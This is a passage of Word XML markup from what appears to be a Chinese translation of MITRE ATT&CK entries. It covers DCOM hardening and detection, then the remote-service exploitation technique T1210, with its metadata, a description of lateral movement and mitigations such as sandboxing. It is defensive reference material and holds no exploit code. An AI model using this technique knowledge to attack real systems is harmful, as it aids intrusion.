            </w:pPr>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启用</w:t>
            </w:r>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>防火墙，默认情况下会阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DCOM</w:t>
            </w:r>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>实例化。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w14:paraId="7E9BAF47" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="399378E0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:spacing w:after="312"/>
            </w:pPr>
            <w:r w:rsidRPr="003256CE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特权账户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6990F08E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00F45B92" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE234F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改与单个</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE234F">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>COM</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE234F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序的进程范围安全性相关联的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F91CEF">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \ AppID \ {{AppID_GUID}}</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的注册表设置（直接或使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Dcomcnfg.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="786966DA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AE234F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>修改与所有未设置其自身进程范围安全性的</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE234F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>COM</w:t>
            </w:r>
            <w:r w:rsidRPr="00AE234F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应用程序的系统范围安全性默认值相关联</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00F91CEF">
              <w:rPr>
                <w:rStyle w:val="HTML"/>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier" w:hint="eastAsia"/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
              </w:rPr>
              <w:t>HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Ole</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>中的注册表设置（直接或使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Dcomcnfg.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45B92">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>）。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35A04130" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF194CB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D8271D" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DLL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和通常与应用程序无关的其他模块。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E61F17" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D8271D" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视与</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象关联的进程的生成，尤其是那些与当前登录的用户不同的用户调用的进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04438C0D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控分布式计算环境</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程过程调用（</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DCE / RPC</w:t>
      </w:r>
      <w:r w:rsidRPr="00D8271D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）流量的流入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E608845" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="0096095B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0096095B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程服务利用</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w14:paraId="2CB76420" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="485885B9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>T1210</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="070EEF10" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>技术：横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62F5FF05" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>macOS</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1245443A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>系统要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>未</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>打</w:t>
            </w:r>
            <w:r>
              <w:t>补丁</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的软件或其他易受攻击的目标。根据目标和目的，系统和可</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>漏洞利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>的服务</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可</w:t>
            </w:r>
            <w:r>
              <w:t>从</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>内部</w:t>
            </w:r>
            <w:r>
              <w:t>网络远程访问</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06571DA5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>所需权限：用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5718FBBC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>Windows</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>错误报告，进程监控，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="747E4F5C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FE38DE" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE38DE">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1288E217" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B940C4" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28564441" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D76265" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>软件漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>攻击指的是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者利用程序、服务或操作系统软件或内核本身中的编程错误执行恶意代码。入侵</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>后对</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>服务</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实施</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>漏洞攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的目的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>往往是横向移动</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>远程系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1085386C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00D76265" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能需要确定远程系统是否处于易受攻击状态，方法是</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>通过网络服务扫描技术</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>其它发现方法来寻找</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以在网络中部署的常见易受攻击软件，查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>是否有没</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安装的</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>漏洞补丁，或者查看是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>用于检测远程漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或本身</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>包含远程漏洞的安全软件。</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于横向移动来说服务器的利用价值可能</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:t>很高</w:t>
      </w:r>
      <w:r w:rsidRPr="00D76265">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但是如果端点系统提供了优势或允许访问其他资源，则端点系统也可能处于风险之中。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D253A9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>常用</w:t>
      </w:r>
      <w:r w:rsidRPr="009B63F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务（例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="009B63F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="009B63F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>RDP</w:t>
      </w:r>
      <w:r w:rsidRPr="009B63F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）以及可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会在</w:t>
      </w:r>
      <w:r w:rsidRPr="009B63F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内部网络和</w:t>
      </w:r>
      <w:r>
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="009B63F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="009B63F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器服务中使用的应用（例如</w:t>
      </w:r>
      <w:r w:rsidRPr="009B63F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r w:rsidRPr="009B63F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）存在几个众所周知的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE05EB9" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者的</w:t>
      </w:r>
      <w:r>
        <w:t>权限</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可能</w:t>
      </w:r>
      <w:r>
        <w:t>会</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>横向移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后获得</w:t>
      </w:r>
      <w:r>
        <w:t>提升，具体</w:t>
      </w:r>
      <w:r w:rsidRPr="009B63F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>取决于易受攻击远程服务的权限级别</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269EC15D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="009C2018" w14:paraId="1AD2FF58" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="336CE4AD" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="009C2018" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C2018">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="738D9D28" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="009C2018" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009C2018">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="006134E6" w14:paraId="672E9573" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B9A9788" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId197" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="006134E6">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>应用隔离和沙箱</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64B3F799" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用沙箱来阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>攻击者</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>利用未发现或未修补的漏洞来实施</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>攻击操作</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。也可通过其他类型的虚拟化和应用微分段来减轻某些类型漏洞攻击的影响。但在这些系统中仍可能存在其他漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>和缺陷攻击风险。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="006134E6" w14:paraId="04B5BB38" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01285A10" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId198" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="006134E6">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特性或程序禁用或移除</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0413BFE7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="006134E6" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将可用</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:t>服务数量控制在最小范围，只允许必要的服务</w:t>
            </w:r>
            <w:r w:rsidRPr="006134E6">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>可用。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="006134E6" w14:paraId="125C43A2" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
